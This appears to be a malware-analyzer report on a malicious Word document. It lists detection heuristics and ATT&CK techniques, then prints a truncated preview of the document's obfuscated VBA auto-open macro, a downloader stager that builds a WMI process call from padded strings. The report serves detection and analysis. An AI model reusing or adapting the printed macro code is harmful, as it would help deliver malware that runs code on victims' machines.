MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of malicious intent. The presence of these elements suggests the document is designed to execute arbitrary code, likely to download and run a second-stage payload. ClamAV detection further supports the malicious classification.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-9403896-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-9403896-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15403 bytes |
SHA-256: 9cbf0a3a5c13b9e03509e56a7d74a249d26420b3922a433567fcb381df041377 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "I7idwd64tfnbzkbfk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Pdcjb1w260q0bh23.Bim7rgvyedd_
End Sub
Attribute VB_Name = "Pdcjb1w260q0bh23"
Attribute VB_Base = "0{507B0B02-5725-407C-83F5-6054E57418F5}{42CD4AA6-C709-4489-820F-75FA577DBB80}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Bim7rgvyedd_()
Sapbw49stjf64wrm = "302"
If Len("Pls0vkz4r_k7y67Mayttil72tz4ctspv") = Len("Hlz3e21ie5yx6oj") + 1 Then End
If Len("Iv45_n_xibwS0r6kdvve1794kesheHubh8x3w8lbuce5t") < Len("I4m35z8w16az") Then
MsgBox "Npeomny2vitsy" + "Cg55_39gp38r7"
MsgBox ("Ph328y4wqz3r")
MsgBox "K3u4kgp5p7ab9lmam" + "Wssfnq3v_rr2eb"
End If
If Len("Xtp60xkqmgl21_mPdh8_njoebzg9m") = Len("T0sa49fn7vbg0bzb") Then
MsgBox "R_6x9fuuja299et" + "Mu3i0uur2lm9hlmp_c"
MsgBox ("Ysc450rt8oq9qsg !!!")
MsgBox "M95ydqo8x5wn0y" + "Y6wvsq20jsbxc"
End If
Phy9p2nlqi8 = Pdcjb1w260q0bh23.HelpContextId + 50 + 50
A4lbsn4fsvjmy3 = "936"
If Len("Ycg2qqh1xx7k2faTwqm498z_mymhg7p") = Len("Sw71xb94dyowcb_") + 1 Then End
If Len("Ys1hq3afs3e36tTqybue0evttzjtXkz6jyfhg9v") < Len("F79f9vgygpaqn0of") Then
MsgBox "Xd2xq65daj5wjsd0" + "Tixnwdd78sjjsk"
MsgBox ("Asj65e3bdc9lm")
MsgBox "X99s0ifsml_" + "Tunu6t0vw2iiej_h"
End If
If Len("Hz425_um2tcdsg9Eniyuipn3qgzzo1j00") = Len("Qh90u4hd_8r") Then
MsgBox "Okn982tacjp" + "J57yn54ftelzjpy7me"
MsgBox ("Mlnvomq4sp00n3 !!!")
MsgBox "P29u1gdmuq_yzsdyz9" + "Yyairl9al1vg98k58"
End If
Dlh4be10iope2llmi = ChrW(Phy9p2nlqi8 + (15))
Mtydvn57n8nxha = "358"
If Len("M8iwoqowvq7xyQyoq5jo7t_l") = Len("F115c100yt6o69") + 1 Then End
If Len("Xcx11g32i_hT_wojlajz73ofSqe5av8gr47kwhp_") < Len("W7ng0bewd6zobl") Then
MsgBox "Oarmxp0wrvt4s" + "S451o8s4t2o_i92h3q"
MsgBox ("Q1v2dnc7k8vqiwx")
MsgBox "B6zxo33s19xhb6" + "Vcl7jeb1mmbh8"
End If
If Len("Hgnvuzmd5e70dag176Q3n91nj_fmlnu6") = Len("K3jwsf81jgakbau") Then
MsgBox "Lg3jf9ixhk1h2t3m" + "Nwpqjnk1bd3"
MsgBox ("Ci0w16g3vprtwohq !!!")
MsgBox "Z2ozhtpegh5sud5r" + "Dc2wbzwutde767f6ac"
End If
Ykc9crcjhpb01eg6z = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Dlh4be10iope2llmi + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Pdcjb1w260q0bh23.Luijmc2l3929 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
Cku7hjjihlywskg02a = "942"
If Len("N_rbt5hz5pf1zsx9gAbe87k1wz_rk6pw") = Len("Q8xjbcavq5bw") + 1 Then End
If Len("D6n_p1_zwegl8fihtuCr72k9s0atrciexuCkq1wtb3q9e") < Len("Un9jlssjddc820fec0") Then
MsgBox "Hvddiebs9605" + "Kbigt48wflabit0yo8"
MsgBox ("M15mzjzfkaupejct")
MsgBox "S0wjcwfkccawc6u0" + "Ikuzu85yxwv7"
End If
If Len("Ufaj9plrqezbwhzuhgM7940afb3vpauogk6v") = Len("Xey37f7x01eeppvpa") Then
MsgBox "Jbi3nt7aeeyp860nj" + "Vebydnhmxr_v__gqr"
MsgBox ("Pf2e77a2_u4kgcg !!!")
MsgBox "P73197vb8paufyiq" + "K3ee1igxnnxunk"
End If
Olau1p4mmly9nzj3 = Ynjahyvoc8dxxfs(Ykc9crcjhpb01eg6z)
Nymysxdzbhxiym = "408"
If Len("Hzbnvk_htho7j84rwBwp6i4lz9278f") = Len("Lu7ca0xhtq4qd
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.